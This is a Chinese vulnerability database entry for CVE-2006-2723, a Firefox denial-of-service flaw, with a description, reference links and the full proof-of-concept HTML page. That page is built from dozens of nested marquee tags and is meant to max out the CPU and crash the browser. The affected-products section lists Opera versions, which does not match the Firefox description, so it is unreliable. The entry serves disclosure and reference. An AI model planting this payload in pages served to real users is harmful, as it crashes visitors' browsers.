Mozilla Firefox marquee标签处理 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110380 漏洞类型 其他
发布时间 2006-06-02 更新时间 2010-02-04
CVE编号 CVE-2006-2723 CNNVD-ID CNNVD-200605-560
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1867
https://www.securityfocus.com/bid/18165
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-560
|漏洞详情
MozillaFirefox是一款非常流行的开源WEB浏览器。MozillaFirefox对HTML标签的处理实现上存在漏洞,恶意HTML网页可能导致浏览器崩溃。MozillaFirefox对畸形HTML标签的处理会占用100%的CPU资源,可能导致浏览器崩溃。漏洞公告目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.mozilla.org/参考网址来源:BID名称:18165链接:http://www.securityfocus.com/bid/18165来源:BUGTRAQ名称:20060530Firefoxdosexploit链接:http://www.securityfocus.com/archive/1/archive/1/435373/100/0/threaded来源:XF名称:firefox-marquee-dos(26898)链接:http://xforce.iss.net/xforce/xfdb/26898来源:BUGTRAQ名称:20060604Re:Re:Firefoxdosexploit链接:http://www.securityfocus.com/archive/1/archive/1/436268/100/0/threaded来源:BUGTRAQ名称:20060531Re:Re:Firefoxdosexploit链接:http://www.securityfocus.com/archive/1/archive/1/435882/100/0/threaded受影响实体MozillaFirefox:2.0:Rc3  更多>>补丁暂无漏洞信息快速查询漏洞名称:漏洞编号:发布时间从:到: 搜索重置相关漏洞更多Bleach安全漏洞发布时间  2018-3-8NetworkSecurityService...发布时间  2017-6-1MozillaNetworkSecurity...发布时间  2017-5-11MozillaNetworkSecurity...发布时间  2017-12-28MozillaNetworkSecurity...发布时间  2017-12-28数据文件快速导航漏洞提交合作伙伴兼容性服务标准规范数据文件关于我们CNNVD介绍常见问题关注我们官方微信新浪微博中国
|漏洞EXP
<html>
<head>
<title>Credit's go to n00b</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

# milw0rm.com [2006-06-02]
|受影响的产品
Opera Software Opera Web Browser 8.51 Opera Software Opera Web Browser 8.50 Opera Software Opera Web Browser 8.0 2 Opera Software Opera Web Browser 8.0 1 Opera Software Opera Web Browser 8.
|参考资料

来源:BID
名称:18165
链接:http://www.securityfocus.com/bid/18165
来源:BUGTRAQ
名称:20060530Firefoxdosexploit
链接:http://www.securityfocus.com/archive/1/archive/1/435373/100/0/threaded
来源:XF
名称:firefox-marquee-dos(26898)
链接:http://xforce.iss.net/xforce/xfdb/26898
来源:BUGTRAQ
名称:20060604Re:Re:Firefoxdosexploit
链接:http://www.securityfocus.com/archive/1/archive/1/436268/100/0/threaded
来源:BUGTRAQ
名称:20060531Re:Re:Firefoxdosexploit
链接:http://www.securityfocus.com/archive/1/archive/1/435882/100/0/threaded